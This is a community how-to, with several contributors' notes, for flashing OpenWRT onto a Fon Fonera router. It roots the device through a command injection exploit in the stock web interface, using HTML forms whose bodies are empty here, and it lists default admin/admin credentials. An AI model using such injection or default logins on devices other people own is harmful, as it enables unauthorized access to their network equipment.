OpenWRT on the Fon Fonera

I want to thank Mcgrew Security http://www.mcgrewsecurity.com/ for doing most the Leg work here.

(notes by Brett Hoff) Dmnhunter in #pauldotcom bhoff—at--open-sourceenterprises.com

(additional notes by Russell Butturini) tcstool in #pauldotcom rbutturini--at--yahoo.com

After countless hours though I still had issues and I hope this helps out a little more.

We have had a few emails in the last few days so I thought I would add some addional notes in here on the flashing procedure....It will look like it is dying after the telent and during the init part. See below.

Big warning: Don’t connect the Fon up to the Internet at all until you finish getting a fresh install of OpenWRT on it. It will probably update itself with new firmware from Fon and lock you out of having any fun at all with it.

Through this, the following sites were very helpful. A lot of the steps are pinched and adapted from them:

* Hacking the La Fonera Part II

* OpenWRT’s Wiki page on the Fonera (Doesn’t display right sometimes. Pull it up in Google’s cache if it gives you problems).

The first order of business is to figure out what version of the firmware I have. The default firmware’s status page helps with this:

We don’t want to turn it into a useless brick in the process of flashing it, and we’re in luck, because the device uses an implementation of RedBoot. To make things easy, we want to enable RedBoot’s ability to listen on the wired Ethernet side for a telnet session on boot. That way, if we screw up, we can always go back into RedBoot and fix it. We’ll also flash it in RedBoot.

To enable RedBoot, we need to get a shell on the default firmware. There’s not an SSH server listening by default, but we’re going to turn one on through a command injection exploit on the web interface. It’s pretty trivial, and it works well on the 0.7.1-r1 version. If you have a newer version, you’ll want to check around to see how to revert it (it might be as simple as holding down the reset button to reset it back to 0.7.1-r1), or if there are new exploits.

(The latest word I've read is that the new units being shipped are coming with a later version of the firmware on them by default; However there are more exploits for the newest firmware. A quick search of YouTube will yield you plenty of how-to videos on using the newer exploits; If all else fails, the unit's firmware can be loaded with the JTAG method.)

You’ll create two html files that submit the right input to the web interface. Go ahead and connect to the Fon’s private network SSID “MyPlace”. First, we want to set up iptables to allow traffic on the SSH port (just save this HTML to your hard drive in a .html file called iptables.html, view it in your web browser, and click submit):

(My Notes: When I did this, I was prompted for a login to the device. If you're lazy like me and didn't read the Fon manual, or got your unit second hand and perhaps don't have the manual, the username is admin and the password is admin....secure!!!)

iptables.html

<html>

<head>

</head>

<body>

</form>

</body>

</html>

Now, we want to actually start the dropbear SSH server. Do the same thing again saving this file as ssh.html

ssh.html

<html>

<head>

</head>

<body>

</form>

</body>

</html>

You should be able to SSH into your Fon on port 22 of its IP address (192.168.10.1). You’ll want to set up dropbear to run whenever you reboot the Fon, too:

Note here I was using a windows laptop to do the flashing ....

Make sure it is plugged into the wall before starting.

Also I used a tftp server that was free for windows and also used putty as my client to both telnet in and to later ssh in. Both can be found by using Google.

(Another note for lazy people, root password here is admin)

weasel@hacktop:~$ ssh root@192.168.10.1

The authenticity of host '192.168.10.1 (192.168.10.1)' can't be established.

RSA key fingerprint is 69:52:42:17:fd:b0:97:1a:5f:33:8d:5a:f0:5b:8a:dc.

Are you sure you want to continue connecting (yes/no)? yes

Warning: Permanently added '192.168.10.1' (RSA) to the list of known hosts.

root@192.168.10.1's password:

BusyBox v1.1.3 (2006.11.21-19:49+0000) Built-in shell (ash)

Enter 'help' for a list of built-in commands.

_______ _______ _______

| ____|| || _ |

| ____|| - || | | |

| | |_______||__| |__|

|___|

Fonera Firmware (Version 0.7.1 rev 1) -------------

* Based on OpenWrt - http://openwrt.org

* Powered by FON - http://www.fon.com

---------------------------------------------------

root@OpenWrt:~# mv /etc/init.d/dropbear /etc/init.d/S50dropbear

Also, use vi to uncomment the two lines in /etc/firewall.user that allow connections on port 22.

(See notes below in the RedBoot Section. This might be a good place to insert information on installing thttpd as it will work for this part of the process as well as the download of the image files.)

To enable RedBoot over Ethernet, you’ll need a modified kernel and a new RedBoot config. For convenience, I set up a web server on the computer I configured my Fon on, downloaded those files, and placed them in the root directory. From here on out, I’ll assume you’ve done the same, know what IP address it’s listening on, and will substitute it in as needed.

Next, get the modified kernel and RedBoot config onto your Fon and apply them:

root@OpenWrt:~# wget http://192.168.10.183/out.hex

Connecting to 192.168.10.183[192.168.10.183]:80

out.hex 100% |*******************************************************| 4096 00:00 ETA

root@OpenWrt:~# wget http://192.168.10.183/openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma

Connecting to 192.168.10.183[192.168.10.183]:80

openwrt-ar531x-2.4-v 100% |*******************************************************| 512 KB 00:00 ETA

Note here the l7 is a lower case L and the number 7.

This did cause me a lot of grief.

root@OpenWrt:~# mtd -e vmlinux.bin.l7 write openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma vmlinux.bin.l7

Unlocking vmlinux.bin.l7 ...

Erasing vmlinux.bin.l7 ...

Writing from openwrt-ar531x-2.4-vmlinux-CAMICIA.lzma to vmlinux.bin.l7 ... [w]

root@OpenWrt:~# reboot

After it finishes rebooting, SSH in and continue…

root@OpenWrt:~# mtd -e "RedBoot config" write out.hex "RedBoot config"

Unlocking RedBoot config ...

Erasing RedBoot config ...

Writing from out.hex to RedBoot config ... [w]

(fping must be installed on the system before running this script)

Once that finishes, your Fon probably won’t reboot correctly. No big deal. We’ll be going into RedBoot to flash the new OpenWRT. Redboot listens on port 9000 of 192.168.1.254 for about ten seconds upon boot before it moves on. You have ten seconds to send Ctrl-C on this port to stop it and allow you to interact with RedBoot. It’s easiest to just use this script, redboot.pl, to connect to RedBoot. Leave it running on the computer you’re configuring this from, plug in the router, and it’ll connect up for you and leave you at a RedBoot prompt.

Notes here you have to send the Ctrl-c to the router to stop the boot process so you can interact with it.

Also you must have the files needed downloaded and installed in the root path of whichever way you are going with this I went tftp server on windows tcstool went http server on Linux. So the choice is yours...

weasel@hacktop:~$ ./redboot.pl 192.168.1.254

Snipped out a bunch of “unreachable” messages

192.168.1.254 is unreachable

192.168.1.254 is alive

-> == Executing boot script in 7.080 seconds - enter ^C to abort

<- ^C

Trying 192.168.1.254...

Connected to 192.168.1.254.

Escape character is '^]'.

RedBoot>

Once we have RedBoot working, we can flash the Fon with the latest OpenWRT. Go to the OpenWRT download site here, download “openwrt-atheros-2.6-vmlinux.lzma” and “openwrt-atheros-2.6-root.jffs2-64k”, and then place them in the root directory of the web server you’re running.

Connect up to RedBoot again, and use the following commands to initialize the memory on the Fon, configure the network settings (with your own computer/web server instead of 192.168.1.5), and write

OpenWRT to the Fon. Note that these commands take some time, especially when you write the root filesystem. Play some Sudoku or something:

Note here you may not see feed back during this step and it may even say your connection is dead but just leave it and it will come up again.!!!!!!!!!!!!!!!!!!!1

The thing I learned in this part of the process is that RedBoot is EXTREMELY picky about the HTTP responses it gets back. I was doing this with a laptop that didn't have a dedicated HTTP server and I really didn't want to install something that would leave a large footprint on the system, so I decided to install a lightweight HTTP server. I tried a couple of different lightweight web server packages which yielded "Unrecognized HTTP response" errors inside of RedBoot. I even got these errors with an older version of Apache. The method I found best for this was to install thttpd. This was my method using Debian:

apt-get install thttpd
copy all your downloaded openWRT files to /tmp (or any other directory of your liking)
thttpd -d /tmp
http://127.0.0.1 to verify you see a directory listing of the files inside /tmp

RedBoot> ip_address -l 192.168.1.254/24 -h 192.168.1.5

IP: 192.168.1.254/255.255.255.0, Gateway: 0.0.0.0

Default server: 192.168.1.5

RedBoot> fis init

About to initialize [format] FLASH image system - continue (y/n)? y

*** Initialize FLASH Image System

... Erase from 0xa87e0000-0xa87f0000: .

... Program from 0x80ff0000-0x81000000 at 0xa87e0000: .

RedBoot> load -r -v -b 0x80040450 /openwrt-atheros-2.6-root.jffs2-64k -m HTTP

Raw file loaded 0x80040450-0x801e044f, assumed entry at 0x80040450

RedBoot> fis create -b 0x80040450 -f 0xA8030000 -l 0x00700000 -e 0x00000000 rootfs

... Erase from 0xa8030000-0xa8730000: ................................................................................................................

... Program from 0x80040450-0x80740450 at 0xa8030000: ................................................................................................................

... Erase from 0xa87e0000-0xa87f0000: .

... Program from 0x80ff0000-0x81000000 at 0xa87e0000: .

RedBoot> load -r -v -b %{FREEMEMLO} /openwrt-atheros-2.6-vmlinux.lzma -m HTTP

Raw file loaded 0x80040800-0x800f07ff, assumed entry at 0x80040800

RedBoot> fis create -r 0x80041000 -e 0x80041000 vmlinux.bin.l7

... Erase from 0xa8730000-0xa87e0000: ...........

... Program from 0x80040800-0x800f0800 at 0xa8730000: ...........

... Erase from 0xa87e0000-0xa87f0000: .

... Program from 0x80ff0000-0x81000000 at 0xa87e0000: .

RedBoot> fis load -l vmlinux.bin.l7

Image loaded from 0x80041000-0x80289086

RedBoot> exec

(Edit: Note that for the line “fis create -b 0×80040450 -f 0xA8030000 -l 0×00700000 -e 0×00000000 rootfs”, you may need to use “-l 0×006F0000″ instead of “-l 00700000″, since the Kamikaze kernel has apparently grown since I wrote this. Thanks to DmnHunter on #pauldotcom for the tip!)

(Confirmed. You definitely have to do this with the latest build of Kamikaze. No worries if you forget though, it will error out quickly and give you a chance to correct.)

The last command starts up the new system. Give it some time to boot up, and it should show up on 192.168.1.1. Now, you can telnet in, and set a password if you like (which will automatically set up an ssh server for you).

Congratulations! If it worked as well for you as it did for me, you’re running a fresh install of OpenWRT on your Fon. You might want to start reading up on the OpenWRT Wiki about how to configure the Kamikaze version of OpenWRT. I’ll also post some scripts, hints, and tricks to this blog as I come up with them (especially when it’s of interest to the security community).

If you are still having problems you can find either myself Dmnhunter, or tcstool or cs_weasel in

IRC room #pauldotcom